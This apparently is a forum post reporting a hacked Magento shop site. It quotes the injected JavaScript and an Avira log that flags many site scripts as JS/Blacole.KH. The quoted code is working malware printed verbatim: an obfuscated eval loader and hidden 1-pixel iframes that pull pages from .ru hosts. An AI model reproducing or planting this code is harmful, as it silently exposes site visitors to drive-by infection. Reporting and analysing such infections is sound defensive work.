裏面

fireold

1. http://remarketa.com/magento/index.php/d-d-d-d-d-d/ml/ml-7-0-x-13-ofset-0-6.html

复制代码

1. ww = (1) ? this : 12;
   
2. v = "v".concat("al");
   
3. if (020 === 0x10 && ww.document) try {
   
4.     document.body++
   
5. } catch (gdsgsdg) {
   
6.     asd = 0;
   
7.     try {
   
8.         d = document["createElement"]("div");
   
9.         d.innerHTML.a = "vasvasv";
   
10.     } catch (agdsg) {
    
11.         asd = 1;
    
12.     }
    
13.     if (!asd) {
    
14.         w = {
    
15.             a: ww
    
16.         }.a;
    
17.         v = "e" + v;
    
18.     }
    
19. }
    
20. e = w["" + v];
    
21. if (1) {
    
22.     f = new Array(40, 101, 115, 110, 98, 114, 105, 110, 108, 32, 39, 39, 32, 122, 11, 10, 31, 30, 32, 31, 116, 97, 113, 30, 101, 112, 98, 107, 31, 59, 32, 99, 109, 99, 116, 107, 101, 109, 114, 46, 98, 112, 101, 96, 114, 101, 68, 106, 101, 108, 99, 110, 115, 38, 39, 104, 100, 114, 96, 107, 101, 38, 39, 59, 12, 8, 13, 9, 30, 32, 31, 30, 101, 112, 98, 107, 45, 113, 114, 98, 30, 61, 31, 37, 104, 115, 114, 112, 57, 45, 47, 98, 115, 110, 99, 103, 109, 96, 107, 46, 113, 115, 47, 98, 109, 117, 109, 114, 50, 47, 44, 112, 103, 110, 39, 58, 11, 10, 31, 30, 32, 31, 99, 113, 99, 105, 46, 114, 114, 121, 107, 99, 46, 111, 109, 115, 104, 114, 105, 110, 108, 32, 60, 30, 39, 96, 96, 115, 110, 106, 117, 115, 99, 39, 58, 11, 10, 31, 30, 32, 31, 99, 113, 99, 105, 46, 114, 114, 121, 107, 99, 46, 97, 109, 114, 99, 99, 114, 31, 59, 32, 38, 46, 39, 58, 11, 10, 31, 30, 32, 31, 99, 113, 99, 105, 46, 114, 114, 121, 107, 99, 46, 103, 99, 105, 102, 102, 116, 31, 59, 32, 38, 47, 112, 119, 37, 59, 12, 8, 32, 31, 30, 32, 100, 111, 100, 106, 44, 115, 115, 119, 108, 100, 44, 119, 104, 98, 116, 103, 30, 61, 31, 37, 49, 111, 118, 39, 58, 11, 10, 31, 30, 32, 31, 99, 113, 99, 105, 46, 114, 114, 121, 107, 99, 46, 107, 99, 102, 115, 30, 61, 31, 37, 49, 111, 118, 39, 58, 11, 10, 31, 30, 32, 31, 99, 113, 99, 105, 46, 114, 114, 121, 107, 99, 46, 115, 109, 112, 31, 59, 32, 38, 47, 112, 119, 37, 59, 12, 8, 13, 9, 30, 32, 31, 30, 105, 101, 30, 40, 32, 98, 111, 98, 115, 109, 100, 108, 116, 45, 101, 101, 115, 67, 108, 100, 107, 101, 109, 114, 66, 120, 71, 100, 39, 37, 101, 112, 98, 107, 38, 39, 41, 31, 121, 13, 9, 30, 32, 31, 30, 32, 31, 30, 32, 99, 109, 99, 116, 107, 101, 109, 114, 46, 118, 112, 105, 115, 99, 40, 38, 58, 100, 104, 116, 32, 104, 98, 61, 91, 37, 101, 112, 98, 107, 91, 37, 62, 59, 45, 100, 104, 116, 62, 38, 39, 59, 12, 8, 32, 31, 30, 32, 31, 30, 32, 31, 98, 111, 98, 115, 109, 100, 108, 116, 45, 101, 101, 115, 67, 108, 100, 107, 101, 109, 114, 66, 120, 71, 100, 39, 37, 101, 112, 98, 107, 38, 39, 46, 96, 110, 112, 100, 108, 100, 66, 102, 105, 107, 98, 40, 100, 111, 100, 106, 39, 59, 12, 8, 32, 31, 30, 32, 124, 11, 10, 124, 39, 40, 40, 57);
    
23. }
    
24. w = f;
    
25. s = [];
    
26. for (i = 0; - i + 480 != 0; i += 1) {
    
27.     j = i;
    
28.     if ((031 == 0x19)) if (e) s = s + String["fromCharCode"]((1 * w[j] + j % 3));
    
29. }
    
30. try {
    
31.     document.body++
    
32. } catch (gdsgd) {
    
33.     e(s)
    
34. } /*/afde63*/
    
35. 
    
36. /*653e49*/
    
37. (function() {
    
38.     var nduto = document.createElement('iframe');
    
39.     nduto.src = 'http://owtaprel.ru/count24.php';
    
40.     nduto.style.position = 'absolute';
    
41.     nduto.style.border = '0';
    
42.     nduto.style.height = '1px';
    
43.     nduto.style.width = '1px';
    
44.     nduto.style.left = '1px';
    
45.     nduto.style.top = '1px';
    
46.     if (!document.getElementById('nduto')) {
    
47.         document.write('<div id=\'nduto\'></div>');
    
48.         document.getElementById('nduto').appendChild(nduto);
    
49.     }
    
50. })(); /*/653e49*/

复制代码

1. (function() {
   
2.     var eqdk = document.createElement('iframe');
   
3. 
   
4.     eqdk.src = 'http://cundimam.ru/count20.php';
   
5.     eqdk.style.position = 'absolute';
   
6.     eqdk.style.border = '0';
   
7.     eqdk.style.height = '1px';
   
8.     eqdk.style.width = '1px';
   
9.     eqdk.style.left = '1px';
   
10.     eqdk.style.top = '1px';
    
11. 
    
12.     if (!document.getElementById('eqdk')) {
    
13.         document.write('<div id=\'eqdk\'></div>');
    
14.         document.getElementById('eqdk').appendChild(eqdk);
    
15.     }
    
16. })();

复制代码

Avira

2013/10/26 下午 06:36 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\dragdrop[1].js'
      包含病毒或有害的程式 'JS/Blacole.KH' [virus]
      已採取動作：
      檔案會移動至 '54de3ac2.qua' 名稱底下的隔離區目錄。.

2013/10/26 下午 06:36 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        803
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/10/26 下午 06:36 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\translate[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.KH [virus]'
      執行的動作：傳輸至掃描程式

2013/10/26 下午 06:36 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\Q4CFJPIR\cookies[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.KH [virus]'
      執行的動作：傳輸至掃描程式

2013/10/26 下午 06:36 [Web Protection] 發現惡意程式碼
      從 URL "http://remarketa.com/magento/js/mage/translate.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.KH' [virus]。
      已採取動作：已略過

2013/10/26 下午 06:36 [Web Protection] 發現惡意程式碼
      從 URL "http://remarketa.com/magento/js/mage/cookies.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.KH' [virus]。
      已採取動作：已略過

2013/10/26 下午 06:36 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\calendar-setup[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.KH [virus]'
      執行的動作：傳輸至掃描程式

2013/10/26 下午 06:36 [Web Protection] 發現惡意程式碼
      從 URL "http://remarketa.com/magento/js/varien/product.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.KH' [virus]。
      已採取動作：封鎖的檔案

2013/10/26 下午 06:36 [Web Protection] 發現惡意程式碼
      從 URL "http://remarketa.com/magento/js/calendar/calendar-setup.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.KH' [virus]。
      已採取動作：已略過

2013/10/26 下午 06:36 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\form[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.KH [virus]'
      執行的動作：傳輸至掃描程式

2013/10/26 下午 06:36 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\prototype[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.KH [virus]'
      執行的動作：傳輸至掃描程式

2013/10/26 下午 06:36 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\effects[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.KH [virus]'
      執行的動作：拒絕存取

2013/10/26 下午 06:36 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\prototype[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.KH [virus]'
      執行的動作：拒絕存取

2013/10/26 下午 06:36 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\dragdrop[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.KH [virus]'
      執行的動作：拒絕存取

2013/10/26 下午 06:36 [Web Protection] 發現惡意程式碼
      從 URL "http://remarketa.com/magento/js/prototype/prototype.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.KH' [virus]。
      已採取動作：已略過

2013/10/26 下午 06:36 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\controls[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.KH [virus]'
      執行的動作：拒絕存取

2013/10/26 下午 06:36 [Web Protection] 發現惡意程式碼
      從 URL "http://remarketa.com/magento/js/varien/form.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.KH' [virus]。
      已採取動作：已略過

2013/10/26 下午 06:36 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\effects[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.KH [virus]'
      執行的動作：傳輸至掃描程式

2013/10/26 下午 06:36 [Web Protection] 發現惡意程式碼
      從 URL "http://remarketa.com/magento/js/prototype/validation.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.KH' [virus]。
      已採取動作：封鎖的檔案

2013/10/26 下午 06:36 [Web Protection] 發現惡意程式碼
      從 URL "http://remarketa.com/magento/js/scriptaculous/builder.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.KH' [virus]。
      已採取動作：封鎖的檔案

2013/10/26 下午 06:36 [Web Protection] 發現惡意程式碼
      從 URL "http://remarketa.com/magento/js/scriptaculous/effects.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.KH' [virus]。
      已採取動作：已略過

2013/10/26 下午 06:36 [Web Protection] 發現惡意程式碼
      從 URL "http://remarketa.com/magento/js/lib/ccard.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.KH' [virus]。
      已採取動作：封鎖的檔案

2013/10/26 下午 06:35 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\controls[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.KH [virus]'
      執行的動作：傳輸至掃描程式

2013/10/26 下午 06:35 [Web Protection] 發現惡意程式碼
      從 URL "http://remarketa.com/magento/js/scriptaculous/slider.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.KH' [virus]。
      已採取動作：封鎖的檔案

2013/10/26 下午 06:35 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\dragdrop[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.KH [virus]'
      執行的動作：傳輸至掃描程式

2013/10/26 下午 06:35 [Web Protection] 發現惡意程式碼
      從 URL "http://remarketa.com/magento/js/scriptaculous/controls.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.KH' [virus]。
      已採取動作：已略過

2013/10/26 下午 06:35 [Web Protection] 發現惡意程式碼
      從 URL "http://remarketa.com/magento/js/scriptaculous/dragdrop.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.KH' [virus]。
      已採取動作：已略過

fs is